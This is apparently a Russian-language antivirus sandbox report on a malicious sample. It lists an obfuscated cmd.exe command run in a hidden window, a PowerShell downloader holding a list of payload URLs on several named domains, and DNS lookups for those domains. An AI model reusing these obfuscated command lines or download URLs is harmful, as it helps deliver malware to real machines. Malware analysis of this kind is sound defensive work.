Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c %tMP:~-8, +1%%CoMmONPrOGramFILES(x86):~-26,-25%d, , , /V^: ^ , /r ", , ( , ( , , , (S^ET ^9^Hu=^iRa w1K XrV ^pXG^ jyB ^fG^k^ SLu^ KV^h^ F5c^ krf Rw^S ^Tv^p^ 1C^7 J2^u S6B^ 8^Y^i ^sBY 1...
Сетевая активность
UDP
- DNS ASK ba####reativa.net
- DNS ASK cc##h.xyz
- DNS ASK bi###hop.pro
- DNS ASK ba##.#iz-shop.pro
- DNS ASK ca######optechnologies.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c %tMP:~-8, +1%%CoMmONPrOGramFILES(x86):~-26,-25%d, , , /V^: ^ , /r ", , ( , ( , , , (S^ET ^9^Hu=^iRa w1K XrV ^pXG^ jyB ^fG^k^ SLu^ KV^h^ F5c^ krf Rw^S ^Tv^p^ 1C^7 J2^u S6B^ 8^Y^i ^sBY 1...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' , , , /V: , /r ", , ( , ( , , , (S^ET ^9^Hu=^iRa w1K XrV ^pXG^ jyB ^fG^k^ SLu^ KV^h^ F5c^ krf Rw^S ^Tv^p^ 1C^7 J2^u S6B^ 8^Y^i ^sBY 1^bJ^}w^P^U}^gov^{Fmqh^jAkcI^wV^ty^dRa^qT^PcVrf}zwgkPOna...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $PhG='WZo';$Nki='http://www.ba####reativa.net/Qa@http://www.ccash.xyz/orwhJc0G@http://www.biz-shop.pro/mEZcNad@http://www.bani.biz-shop.pro/F6@http://www.carbonlooptechnologies.com/LPPaE6'.Spli...
